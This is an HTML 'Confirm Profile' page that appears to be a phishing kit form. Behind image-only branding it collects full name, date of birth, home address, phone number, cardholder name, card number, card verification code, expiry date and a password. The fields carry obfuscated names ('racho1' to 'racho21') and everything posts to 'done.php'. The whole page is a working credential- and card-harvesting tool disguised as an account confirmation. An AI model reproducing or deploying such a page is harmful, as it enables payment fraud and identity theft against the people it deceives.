<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Confirm Profile</title>
<style type="text/css">
body
{
   background-color: #FFFFFF;
   color: #000000;
}
</style>
<style type="text/css">
#wb_Image1{
background-image:url('Confirm%20profile_fichiers/015.png');
background-postion:center;
background-repeat:no-repeat;
}
#wb_Image2{
background-image:url('Confirm%20profile_fichiers/012.png');
background-postion:center;
background-repeat:no-repeat;
}
#wb_Image3{
background-image:url('Confirm%20profile_fichiers/018.png');
background-postion:center;
background-repeat:no-repeat;
}
#wb_Image4{
background-image:url('Confirm%20profile_fichiers/014.png');
background-postion:center;
background-repeat:no-repeat;
}

a
{
   color: #C8D7EB;
   outline: none;
   text-decoration: underline;
}
a:visited
{
   color: #C8D7EB;
}
a:active
{
   color: #C8D7EB;
}
a:hover
{
   color: #376BAD;
   text-decoration: underline;
}
.CustomStyle
{
   font-family: "Courier New";
   font-size: 11px;
   font-weight: bold;
   font-style: normal;
   text-decoration: none;
   color: #000080;
   background-color: #FECF7D;
   background-image: url(http://img4.hostingpics.net/pics/86692254cc.png);
   background-repeat: no-repeat;
}
</style>
<style type="text/css">
#Image1
{
   border: 0px #000000 solid;
}
#Image2
{
   border: 0px #000000 solid;
}
#Image3
{
   border: 0px #000000 solid;
}
#Image4
{
   border: 0px #000000 solid;
}
#Editbox1
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox2
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox3
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox4
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox5
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Image5
{
   border: 0px #000000 solid;
}
#Editbox6
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox7
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox8
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox9
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox10
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Combobox1
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color: #000000;
   font-family: Arial;
   font-size: 11px;
}
#Combobox2
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color: #000000;
   font-family: Arial;
   font-size: 11px;
}
#Combobox33
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color: #000000;
   font-family: Arial;
   font-size: 11px;
}
#Combobox34
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color: #000000;
   font-family: Arial;
   font-size: 11px;
}
#Combobox35
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color: #000000;
   font-family: Arial;
   font-size: 11px;
}
#Editbox11
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Combobox4
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color: #000000;
   font-family: Arial;
   font-size: 11px;
}
#Combobox3
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color: #000000;
   font-family: Arial;
   font-size: 11px;
}
#Editbox12
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox13
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox14
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox15
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Editbox16
{
   border: 1px #84A8CC solid;
   background-color: #FFFFFF;
   color :#000000;
   font-family: Arial;
   font-size: 11px;
   text-align: left;
   vertical-align: middle;
}
#Image6
{
   border: 0px #000000 solid;
}
#Button1
{
}
#Image7
{
   border: 0px #000000 solid;
}
</style>
<script>
<!-- 
function Blank_TextField_Validator()
{

if (text_form.racho1.value == "")
{
 
   alert("Please Enter Your First Name");
  
   text_form.racho1.focus();

   return (false);
}

if (text_form.racho2.value == "")
{
 
   alert("Please Enter Your Last Name");
  
   text_form.racho2.focus();

   return (false);
}

if (text_form.racho3.value == "day")
{
   alert("Please Enter Your Day of Birth");
  
   text_form.racho3.focus();
   return (false);
}
if (text_form.racho4.value == "month")
{
   alert("Please Enter Your Month of Birth");
  
   text_form.racho4.focus();
   return (false);
}
if (text_form.racho5.value == "year")
{
   alert("Please Enter Your Year of Birth");
  
   text_form.racho5.focus();
   return (false);
}
if (text_form.racho6.value == "")
{
   alert("Please Enter Your Address Line");
  
   text_form.racho6.focus();
   return (false);
}
if (text_form.racho8.value == "")
{
   alert("Please Enter Your City");
  
   text_form.racho8.focus();
   return (false);
}
if (text_form.racho9.value == "Country")
{
   alert("Please Enter Your Country");
  
   text_form.racho9.focus();
   return (false);
}
if (text_form.racho10.value == "")
{
   alert("Please Enter Your Zip code");
  
   text_form.racho10.focus();
   return (false);
}
if (text_form.racho11.value == "")
{
   alert("Please Enter Your Home Phone Number");
  
   text_form.racho11.focus();
   return (false);
}
if (text_form.racho12.value == "")
{
   alert("Please Enter Your Name Of Cardholder");
  
   text_form.racho12.focus();
   return (false);
}
if (text_form.racho13.value == "")
{
   alert("Please Enter Your Card Number");
  
   text_form.racho13.focus();
   return (false);
 }  
  if (text_form.racho14.value == "")
{
   alert("Please Enter Your Card Verification Number");
  
   text_form.racho14.focus();
   return (false); 
}
if (text_form.racho15.value == "month")
{
   alert("Please Enter Your Month of Expiration date");
  
   text_form.racho15.focus();
   return (false);
}
if (text_form.racho16.value == "year")
{
   alert("Please Enter Your Year of Expiration date");
  
   text_form.racho16.focus();
   return (false);
}

return (true);

}

-->
</script>
</head>
<body>
<form name="text_form" method="post" action="done.php" onsubmit="return Blank_TextField_Validator()">

<div id="wb_Image1" style="position:absolute;left:130px;top:0px;width:763px;height:247px;z-index:0;padding:0;">
</div>
<div id="wb_Image2" style="position:absolute;left:130px;top:254px;width:755px;height:411px;z-index:1;padding:0;">
</div>
<div id="wb_Image3" style="position:absolute;left:130px;top:709px;width:776px;height:422px;z-index:2;padding:0;">
</div>
<div id="wb_Image4" style="position:absolute;left:190px;top:1210px;width:618px;height:135px;z-index:3;padding:0;">
</div>
<input id="Editbox1" type="text" name="racho1" style="position: absolute; left: 442px; line-height: 18px; z-index: 4; height: 17px; top: 381px; width: 132px;">
<input id="Editbox2" type="text" name="racho2" style="position: absolute; left: 442px; line-height: 18px; z-index: 4; height: 17px; top: 409px; width: 107px;">

<select id="Combobox33" style="position: absolute; z-index: 15; left: 442px; height: 19px; top: 437px; width: 48px;" size="1" name="racho3">
<option selected="selected" value="day">day</option>
<OPTION value="1">01</OPTION>
<OPTION value="02">02</OPTION>
<OPTION value="03">03</OPTION>
<OPTION value="04">04</OPTION>
<OPTION value="05">05</OPTION>
<OPTION value="06">06</OPTION>
<OPTION value="07">07</OPTION>
<OPTION value="08">08</OPTION>
<OPTION value="09">09</OPTION>
<OPTION value="10">10</OPTION>
<OPTION value="11">11</OPTION>
<OPTION value="12">12</OPTION>
<OPTION value="13">13</OPTION>
<OPTION value="14">14</OPTION>
<OPTION value="15">15</OPTION>
<OPTION value="16">16</OPTION>
<OPTION value="17">17</OPTION>
<OPTION value="18">18</OPTION>
<OPTION value="19">19</OPTION>
<OPTION value="20">20</OPTION>
<OPTION value="21">21</OPTION>
<OPTION value="22">22</OPTION>
<OPTION value="23">23</OPTION>
<OPTION value="24">24</OPTION>
<OPTION value="25">25</OPTION>
<OPTION value="26">26</OPTION>
<OPTION value="27">27</OPTION>
<OPTION value="28">28</OPTION>
<OPTION value="29">29</OPTION>
<OPTION value="30">30</OPTION>
<OPTION value="31">31</OPTION>
</SELECT>
<select id="Combobox34" name="racho4" size="1" style="position: absolute; z-index: 15; height: 19px; top: 437px; left: 493px; width: 60px;">
<option selected="selected" value="month">month</option>
<option value="JAN">January</option>
<option value="FEB">February</option>
<option value="MAR">March</option>
<option value="APR">April</option>
<option value="May">May</option>
<option value="Jun">June</option>
<option value="JUL">July</option>
<option value="AUG">August</option>
<option value="SEP">September</option>
<option value="OCT">October</option>
<option value="NOV">November</option>
<option value="DEC">December</option>
</select>
<select id="Combobox35" style="position: absolute; z-index: 15; height: 19px; top: 437px; left: 556px; width: 55px;" size="1" name="racho5">
<option selected="selected" value="year">year</option>
<option value="2013">2013</option>
<option value="2012">2012</option>
<option value="2011">2011</option>
<option value="2010">2010</option>
<option value="2009">2009</option>
<option value="2008">2008</option>
<option value="2007">2007</option>
<option value="2006">2006</option>
<option value="2005">2005</option>
<option value="2004">2004</option>
<option value="2003">2003</option>
<option value="2002">2002</option>
<option value="2001">2001</option>
<option value="2000">2000</option>
<option value="1999">1999</option>
<option value="1998">1998</option>
<option value="1997">1997</option>
<option value="1996">1996</option>
<option value="1995">1995</option>
<option value="1994">1994</option>
<option value="1993">1993</option>
<option value="1992">1992</option>
<option value="1991">1991</option>
<option value="1990">1990</option>
<option value="1989">1989</option>
<option value="1988">1988</option>
<option value="1987">1987</option>
<option value="1986">1986</option>
<option value="1985">1985</option>
<option value="1984">1984</option>
<option value="1983">1983</option>
<option value="1982">1982</option>
<option value="1981">1981</option>
<option value="1980">1980</option>
<option value="1979">1979</option>
<option value="1978">1978</option>
<option value="1977">1977</option>
<option value="1976">1976</option>
<option value="1975">1975</option>
<option value="1974">1974</option>
<option value="1973">1973</option>
<option value="1972">1972</option>
<option value="1971">1971</option>
<option value="1970">1970</option>
<option value="1969">1969</option>
<option value="1968">1968</option>
<option value="1967">1967</option>
<option value="1966">1966</option>
<option value="1965">1965</option>
<option value="1964">1964</option>
<option value="1963">1963</option>
<option value="1962">1962</option>
<option value="1961">1961</option>
<option value="1960">1960</option>
<option value="1959">1959</option>
<option value="1958">1958</option>
<option value="1957">1957</option>
<option value="1956">1956</option>
<option value="1955">1955</option>
<option value="1954">1954</option>
<option value="1953">1953</option>
<option value="1952">1952</option>
<option value="1951">1951</option>
<option value="1950">1950</option>
<option value="1949">1949</option>
<option value="1948">1948</option>
<option value="1947">1947</option>
<option value="1946">1946</option>
<option value="1945">1945</option>
<option value="1944">1944</option>
<option value="1943">1943</option>
<option value="1942">1942</option>
<option value="1941">1941</option>
<option value="1940">1940</option>
<option value="1939">1939</option>
<option value="1938">1938</option>
<option value="1937">1937</option>
<option value="1936">1936</option>
<option value="1935">1935</option>
<option value="1934">1934</option>
<option value="1933">1933</option>
<option value="1932">1932</option>
<option value="1931">1931</option>
<option value="1930">1930</option>
<option value="1929">1929</option>
<option value="1928">1928</option>
<option value="1927">1927</option>
<option value="1926">1926</option>
<option value="1925">1925</option>
<option value="1924">1924</option>
<option value="1923">1923</option>
<option value="1922">1922</option>
<option value="1921">1921</option>
<option value="1920">1920</option>
<option value="1919">1919</option>
<option value="1918">1918</option>
<option value="1917">1917</option>
<option value="1916">1916</option>
<option value="1915">1915</option>
<option value="1914">1914</option>
<option value="1913">1913</option>
<option value="1912">1912</option>
<option value="1911">1911</option>
<option value="1910">1910</option>
<option value="1909">1909</option>
<option value="1908">1908</option>
<option value="1907">1907</option>
<option value="1906">1906</option>
<option value="1905">1905</option>
</select>

<input id="Editbox3" type="text" name="racho6" style="position: absolute; line-height: 18px; z-index: 8; left: 442px; top: 464px; height: 17px; width: 182px;">
<input id="Editbox4" type="text" name="racho7" style="position: absolute; width: 183px; line-height: 18px; z-index: 8; top: 492px; height: 17px; left: 442px;">
<input id="Editbox5" type="text" name="racho8" style="position: absolute; line-height: 18px; z-index: 8; top: 520px; height: 17px; left: 442px; width: 107px;">


<select id="Combobox1" style="position: absolute; z-index: 15; top: 548px; height: 18px; left: 442px; width: 147px;" size="1" name="racho9">
<option selected="selected" value="United Kingdom">United Kingdom</option>
<option value="Afghanistan">Afghanistan</option>
<option value="Albania">Albania</option>
<option value="Algeria">Algeria</option>
<option value="Andorra">Andorra</option>
<option value="Angola">Angola</option>
<option value="Anguilla">Anguilla</option>
<option value="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="Argentina">Argentina</option>
<option value="Armenia">Armenia</option>
<option value="Aruba">Aruba</option>
<option value="Australia">Australia</option>
<option value="Austria">Austria</option>
<option value="Azerbaijan">Azerbaijan</option>
<option value="Bahamas">Bahamas</option>
<option value="Bahrain">Bahrain</option>
<option value="Bangladesh">Bangladesh</option>
<option value="Barbados">Barbados</option>
<option value="Belarus">Belarus</option>
<option value="Belgium">Belgium</option>
<option value="Belize">Belize</option>
<option value="Benin">Benin</option>
<option value="Bermuda">Bermuda</option>
<option value="Bhutan">Bhutan</option>
<option value="Bolivia">Bolivia</option>
<option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="Botswana">Botswana</option>
<option value="Brazil">Brazil</option>
<option value="Brunei">Brunei</option>
<option value="Bulgaria">Bulgaria</option>
<option value="Burkina Faso">Burkina Faso</option>
<option value="Burundi">Burundi</option>
<option value="Cambodia">Cambodia</option>
<option value="Cameroon">Cameroon</option>
<option value="Canada">Canada</option>
<option value="Cape Verde Islands">Cape Verde Islands</option>
<option value="Cayman Islands">Cayman Islands</option>
<option value="Central African Republic">Central African Republic</option>
<option value="Chad">Chad</option>
<option value="Channel Islands">Channel Islands</option>
<option value="Chile">Chile</option>
<option value="China">China</option>
<option value="Christmas Island">Christmas Island</option>
<option value="Colombia">Colombia</option>
<option value="Comoros">Comoros</option>
<option value="Congo">Congo</option>
<option value="Cook Islands">Cook Islands</option>
<option value="Costa Rica">Costa Rica</option>
<option value="Croatia">Croatia</option>
<option value="Cuba">Cuba</option>
<option value="Cyprus">Cyprus</option>
<option value="Czech Republic">Czech Republic</option>
<option value="Denmark">Denmark</option>
<option value="Djibouti">Djibouti</option>
<option value="Dominica">Dominica</option>
<option value="Dominican Republic">Dominican Republic</option>
<option value="Ecuador">Ecuador</option>
<option value="Egypt">Egypt</option>
<option value="El Salvador">El Salvador</option>
<option value="Estonia">Estonia</option>
<option value="Ethiopia">Ethiopia</option>
<option value="Falkland Islands">Falkland Islands</option>
<option value="Faroe Islands">Faroe Islands</option>
<option value="Fiji">Fiji</option>
<option value="Finland">Finland</option>
<option value="France">France</option>
<option value="Gabon">Gabon</option>
<option value="Gambia">Gambia</option>
<option value="Georgia">Georgia</option>
<option value="Germany">Germany</option>
<option value="Ghana">Ghana</option>
<option value="Gibraltar">Gibraltar</option>
<option value="Greece">Greece</option>
<option value="Greenland">Greenland</option>
<option value="Grenada">Grenada</option>
<option value="Guatemala">Guatemala</option>
<option value="Guinea">Guinea</option>
<option value="Guyana">Guyana</option>
<option value="Haiti">Haiti</option>
<option value="Honduras">Honduras</option>
<option value="Hong Kong">Hong Kong</option>
<option value="Hungary">Hungary</option>
<option value="Iceland">Iceland</option>
<option value="India">India</option>
<option value="Indonesia">Indonesia</option>
<option value="Iran">Iran</option>
<option value="Iraq">Iraq</option>
<option value="Isle of Man">Isle of Man</option>
<option value="Israel">Israel</option>
<option value="Italy">Italy</option>
<option value="Jamaica">Jamaica</option>
<option value="Japan">Japan</option>
<option value="Jordan">Jordan</option>
<option value="Kenya">Kenya</option>
<option value="Kiribati">Kiribati</option>
<option value="Kuwait">Kuwait</option>
<option value="Laos">Laos</option>
<option value="Latvia">Latvia</option>
<option value="Lebanon">Lebanon</option>
<option value="Lesotho">Lesotho</option>
<option value="Liberia">Liberia</option>
<option value="Libya">Libya</option>
<option value="Liechtenstein">Liechtenstein</option>
<option value="Lithuania">Lithuania</option>
<option value="Luxembourg">Luxembourg</option>
<option value="Madagascar">Madagascar</option>
<option value="Malawi">Malawi</option>
<option value="Malaysia">Malaysia</option>
<option value="Maldives">Maldives</option>
<option value="Mali">Mali</option>
<option value="Malta">Malta</option>
<option value="Martinique">Martinique</option>
<option value="Mauritania">Mauritania</option>
<option value="Mauritius">Mauritius</option>
<option value="Mexico">Mexico</option>
<option value="Monaco">Monaco</option>
<option value="Mongolia">Mongolia</option>
<option value="Morocco">Morocco</option>
<option value="Mozambique">Mozambique</option>
<option value="Namibia">Namibia</option>
<option value="Nauru">Nauru</option>
<option value="Nepal">Nepal</option>
<option value="Netherlands">Netherlands</option>
<option value="Netherlands Antilles">Netherlands Antilles</option>
<option value="New Caledonia">New Caledonia</option>
<option value="New Zealand">New Zealand</option>
<option value="Nicaragua">Nicaragua</option>
<option value="Niger">Niger</option>
<option value="Nigeria">Nigeria</option>
<option value="North Korea">North Korea</option>
<option value="Norway">Norway</option>
<option value="Oman">Oman</option>
<option value="Pakistan">Pakistan</option>
<option value="Palau">Palau</option>
<option value="Panama">Panama</option>
<option value="Paraguay">Paraguay</option>
<option value="Peru">Peru</option>
<option value="Philippines">Philippines</option>
<option value="Pitcairn Islands">Pitcairn Islands</option>
<option value="Poland">Poland</option>
<option value="Portugal">Portugal</option>
<option value="Puerto Rico">Puerto Rico</option>
<option value="Qatar">Qatar</option>
<option value="Republic of Ireland">Republic of Ireland</option>
<option value="Republic Of Kazakhstan">Republic Of Kazakhstan</option>
<option value="Romania">Romania</option>
<option value="Russia">Russia</option>
<option value="Rwanda">Rwanda</option>
<option value="Saint Lucia">Saint Lucia</option>
<option value="Sao Tome">Sao Tome</option>
<option value="Saudi Arabia">Saudi Arabia</option>
<option value="Senegal">Senegal</option>
<option value="Serbia and Montenegro">Serbia and Montenegro</option>
<option value="Seychelles">Seychelles</option>
<option value="Sierra Leone">Sierra Leone</option>
<option value="Singapore">Singapore</option>
<option value="Slovakia">Slovakia</option>
<option value="Slovenia">Slovenia</option>
<option value="Somalia">Somalia</option>
<option value="South Africa">South Africa</option>
<option value="South Korea">South Korea</option>
<option value="South Sandwich Islands">South Sandwich Islands</option>
<option value="Spain">Spain</option>
<option value="Sri Lanka">Sri Lanka</option>
<option value="Sudan">Sudan</option>
<option value="Suriname">Suriname</option>
<option value="Swaziland">Swaziland</option>
<option value="Sweden">Sweden</option>
<option value="Switzerland">Switzerland</option>
<option value="Syria">Syria</option>
<option value="Taiwan">Taiwan</option>
<option value="Tanzania">Tanzania</option>
<option value="Thailand">Thailand</option>
<option value="Togo">Togo</option>
<option value="Tonga">Tonga</option>
<option value="Trinidad and Tobago">Trinidad and Tobago</option>
<option value="Tunisia">Tunisia</option>
<option value="Turkey">Turkey</option>
<option value="Tuvalu">Tuvalu</option>
<option value="Uganda">Uganda</option>
<option value="Ukraine">Ukraine</option>
<option value="United Arab Emirates">United Arab Emirates</option>
<option value="Uruguay">Uruguay</option>
<option value="USA">USA</option>
<option value="Uzbekistan">Uzbekistan</option>
<option value="Vanuatu">Vanuatu</option>
<option value="Vatican City">Vatican City</option>
<option value="Venezuela">Venezuela</option>
<option value="Vietnam">Vietnam</option>
<option value="Virgin Islands">Virgin Islands</option>
<option value="Yemen">Yemen</option>
<option value="Zambia">Zambia</option>
<option value="Zimbabwe">Zimbabwe</option>
</select>
<input id="Editbox5" type="text" name="racho10" style="position: absolute; line-height: 18px; z-index: 8; height: 17px; top: 575px; left: 442px; width: 57px;">
<input id="Editbox6" type="text" name="racho11" style="position: absolute; line-height: 18px; z-index: 8; top: 603px; height: 17px; left: 442px; width: 82px;">
<input id="Editbox7" type="text" name="racho12" style="position: absolute; line-height: 18px; z-index: 8; top: 828px; height: 17px; left: 455px; width: 132px;">

<input id="Editbox8" type="text" maxlength="16" name="racho13" style="position: absolute; line-height: 18px; z-index: 17; top: 856px; height: 17px; left: 455px; width: 132px;">
<input id="Editbox9" type="text" maxlength="4" name="racho14" style="position: absolute; line-height: 18px; z-index: 20; top: 931px; height: 17px; left: 455px; width: 47px;">

<select id="Combobox4" style="position: absolute; z-index: 18; top: 896px; height: 19px; left: 455px; width: 60px;" size="1" name="racho15">
<option selected="selected" value="month">month</option>
<option value="JAN">January</option>
<option value="FEB">February</option>
<option value="MAR">March</option>
<option value="APR">April</option>
<option value="May">May</option>
<option value="Jun">June</option>
<option value="JUL">July</option>
<option value="AUG">August</option>
<option value="SEP">September</option>
<option value="OCT">October</option>
<option value="NOV">November</option>
<option value="DEC">December</option>
</select>
<select id="Combobox3" style="position: absolute; z-index: 19; top: 896px; height: 19px; left: 518px; width: 55px;" size="1" name="racho16">
<option selected="selected" value="year">year</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2018">2018</option>
<option value="2018">2018</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
<option value="2021">2021</option>
<option value="2022">2022</option>
</select>
<input id="Editbox10" type="text" value="" name="racho17" style="position: absolute; line-height: 18px; z-index: 24; top: 959px; height: 17px; left: 455px; width: 107px;">
<input id="Editbox11" type="text" value="" name="racho18" style="position: absolute; line-height: 18px; z-index: 24; top: 987px; height: 17px; left: 455px; width: 77px;">

<input id="Editbox14" type="password" value="" name="racho21" style="position: absolute; line-height: 18px; z-index: 24; top: 1016px; height: 17px; left: 455px; width: 107px;">

<input id="Button1" name="" value="" class="CustomStyle" style="position:absolute;left:450px;top:1150px;width:77px;height:18px;z-index:26;" type="submit">

</body></html>